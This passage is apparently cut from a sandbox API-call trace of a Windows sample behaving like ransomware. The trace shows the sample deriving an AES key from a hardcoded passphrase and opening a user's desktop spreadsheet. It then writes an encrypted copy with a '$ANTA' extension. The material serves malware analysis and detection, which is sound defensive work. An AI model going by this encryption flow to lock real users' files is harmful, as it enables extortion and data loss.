hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0118.246] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0118.246] PeekMessageW (in: lpMsg=0x144ea34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea34) returned 0 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0118.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0118.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0118.246] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0118.247] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0118.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.247] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0118.247] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0118.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.247] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0118.247] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.247] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0118.248] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.248] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0118.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca838, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0118.248] CryptHashData (hHash=0x41ac180, pbData=0x17e27e8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0118.248] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.248] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0118.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caa60, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0118.248] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0118.249] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0118.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0118.249] CryptDestroyHash (hHash=0x41ac180) returned 1 [0118.249] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\0ocqbhc.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0118.249] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.249] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0118.249] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0118.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0118.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.249] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\0ocqbhc.xls.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0118.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.262] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.262] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0118.262] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0118.262] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.262] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0118.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0b020 [0118.267] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0118.267] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x249c, lpOverlapped=0x0) returned 1 [0118.268] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0118.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.268] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x249c) returned 0x43fb458 [0118.269] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0b020 | out: hHeap=0x1780000) returned 1 [0118.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0118.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0118.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x249c) returned 0x4516010 [0118.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb458 | out: hHeap=0x1780000) returned 1 [0118.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.274] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0118.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x249c) returned 0x43fb458 [0118.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fb458 | out: hHeap=0x1780000) returned 1 [0118.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0118.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.274] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0118.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0118.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.277] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392570 [0118.277] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0118.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0118.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0118.277] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x249c) returned 0x43fb458 [0118.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6d0 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x249c) returned 0x45184b8 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.278] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0118.278] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0118.279] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.279] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.279] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 